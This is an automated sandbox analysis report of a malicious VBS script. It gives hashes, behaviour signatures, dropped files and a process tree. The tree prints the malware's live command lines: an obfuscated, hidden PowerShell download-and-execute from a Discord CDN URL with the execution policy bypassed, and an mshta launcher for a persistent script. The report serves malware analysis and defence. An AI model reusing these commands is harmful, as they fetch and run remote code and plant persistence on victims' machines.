e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs

General

Target:     e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs
Filesize:   828B
Completed:  15-09-2021 08:33
Score:      8/10
MD5:        9af0d5fbc14e3ac0ae409dfef6e04228
SHA1:       931b3139830e5485f198bb72ecba50475e4c8df2
SHA256:     e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed

Malware Config
Signatures 7

Defense Evasion
Discovery
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flow  pid   process
    7     2020  powershell.exe
  • Drops startup file
    powershell.exe

    Reported IOCs

    description   ioc                                                                                     process
    File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.vbs  powershell.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies Internet Explorer settings
    mshta.exe

    TTPs

    Modify Registry

    Reported IOCs

    description  ioc                                                                                                      process
    Key created  \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe, powershell.exe

    Reported IOCs

    pid   process
    2020  powershell.exe
    2020  powershell.exe
    1252  powershell.exe
    1252  powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, powershell.exe

    Reported IOCs

    description              pid   process
    Token: SeDebugPrivilege  2020  powershell.exe
    Token: SeDebugPrivilege  1252  powershell.exe
  • Suspicious use of WriteProcessMemory
    WScript.exe, powershell.exe, WScript.exe, cmd.exe, mshta.exe

    Reported IOCs

    description                       pid   process         target process
    PID 1100 wrote to memory of 2020  1100  WScript.exe     powershell.exe
    PID 1100 wrote to memory of 2020  1100  WScript.exe     powershell.exe
    PID 1100 wrote to memory of 2020  1100  WScript.exe     powershell.exe
    PID 2020 wrote to memory of 696   2020  powershell.exe  WScript.exe
    PID 2020 wrote to memory of 696   2020  powershell.exe  WScript.exe
    PID 2020 wrote to memory of 696   2020  powershell.exe  WScript.exe
    PID 696 wrote to memory of 324    696   WScript.exe     cmd.exe
    PID 696 wrote to memory of 324    696   WScript.exe     cmd.exe
    PID 696 wrote to memory of 324    696   WScript.exe     cmd.exe
    PID 324 wrote to memory of 1456   324   cmd.exe         mshta.exe
    PID 324 wrote to memory of 1456   324   cmd.exe         mshta.exe
    PID 324 wrote to memory of 1456   324   cmd.exe         mshta.exe
    PID 1456 wrote to memory of 1252  1456  mshta.exe       powershell.exe
    PID 1456 wrote to memory of 1252  1456  mshta.exe       powershell.exe
    PID 1456 wrote to memory of 1252  1456  mshta.exe       powershell.exe
Processes 6
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"
    Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results
      Blocklisted process makes network request
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        Suspicious use of WriteProcessMemory
        PID:696
        • C:\Windows\System32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          Suspicious use of WriteProcessMemory
          PID:324
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            Modifies Internet Explorer settings
            Suspicious use of WriteProcessMemory
            PID:1456
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              PID:1252
Network
MITRE ATT&CK Matrix
Tactic columns: Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation
Downloads
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5:    715a8616bed900968c1073f51a046daa
    SHA1:   995665c72cfa9c88d8edab3e6212b17ac479aab8
    SHA256: 0d433c2cd57ed977bf3681c0b0eb87acf21a237647eee1afd741c008fe22740e
    SHA512: 8c99f8ba6b03e4bca03116132dd93bea84e8fd0e49a0f7b67d46533e0e735a0c3301bde4c18e6e45659e8fa3f68fcf12c78017d9740c5220d76bfe4b2908a8a1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5:    614da39dd1b9bc0cad2bf9331f98340c
    SHA1:   72dd5336860a1a3e500f779f78a935d84970c14d
    SHA256: 266e4fb9d33676d994247bd0136bf588f7811cf2c325fa82fddbd77a6d8c7663
    SHA512: e846c6a133551925df78c7029a9051f390736acc13ce75a7ab64e91e4283f785aa057af8427b1b0f01320685647bb3021d1bdc09ea6baa8d6d7bbb2a2c86196c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
    MD5:    558a8b7b3fdef4ca79110f8cfd126694
    SHA1:   d6e96ca27f701b3f4c24885dacd14c762a9d36b0
    SHA256: 38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7
    SHA512: 37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

  • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
    MD5:    7f85382953fde20b101039d48673dbd2
    SHA1:   5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9
    SHA256: fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f
    SHA512: 6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

  • C:\Users\Public\myScript.ps1
    MD5:    317f5c7ef5b887966f963c21a60e2889
    SHA1:   5078bdb3e7376202c7253a8b428a360e1c047863
    SHA256: cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd
    SHA512: e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750

  • memory/324-76-0x0000000000000000-mapping.dmp
  • memory/696-72-0x0000000000000000-mapping.dmp
  • memory/1100-60-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp
  • memory/1252-85-0x000000001AC34000-0x000000001AC36000-memory.dmp
  • memory/1252-78-0x0000000000000000-mapping.dmp
  • memory/1252-84-0x000000001AC30000-0x000000001AC32000-memory.dmp
  • memory/1252-91-0x0000000002520000-0x0000000002522000-memory.dmp
  • memory/1456-77-0x0000000000000000-mapping.dmp
  • memory/2020-71-0x000000001B610000-0x000000001B611000-memory.dmp
  • memory/2020-70-0x0000000001FE0000-0x0000000001FE2000-memory.dmp
  • memory/2020-69-0x000000001B9E0000-0x000000001B9E1000-memory.dmp
  • memory/2020-68-0x0000000002974000-0x0000000002976000-memory.dmp
  • memory/2020-67-0x0000000001E40000-0x0000000001E41000-memory.dmp
  • memory/2020-66-0x0000000001E10000-0x0000000001E11000-memory.dmp
  • memory/2020-63-0x0000000002970000-0x0000000002972000-memory.dmp
  • memory/2020-65-0x000000001AD60000-0x000000001AD61000-memory.dmp
  • memory/2020-64-0x0000000001CA0000-0x0000000001CA1000-memory.dmp
  • memory/2020-61-0x0000000000000000-mapping.dmp